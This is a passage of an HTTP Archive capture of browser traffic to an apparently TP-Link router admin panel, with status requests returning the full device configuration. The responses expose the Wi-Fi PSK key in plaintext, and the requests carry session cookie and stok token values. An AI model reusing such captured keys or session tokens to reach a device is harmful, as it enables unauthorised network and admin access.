ireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.01,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 276,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 693,\r\n \"receive\": 25\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:19.651+03:00\",\r\n \"time\": 1842,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 251,\r\n \"connect\": 523,\r\n \"send\": 0,\r\n \"wait\": 793,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:29.645+03:00\",\r\n \"time\": 990,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4755,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4755\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 276,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 674,\r\n \"receive\": 40\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:29.651+03:00\",\r\n \"time\": 1855,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 250,\r\n \"connect\": 520,\r\n \"send\": 0,\r\n \"wait\": 810,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:39.647+03:00\",\r\n \"time\": 995,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": 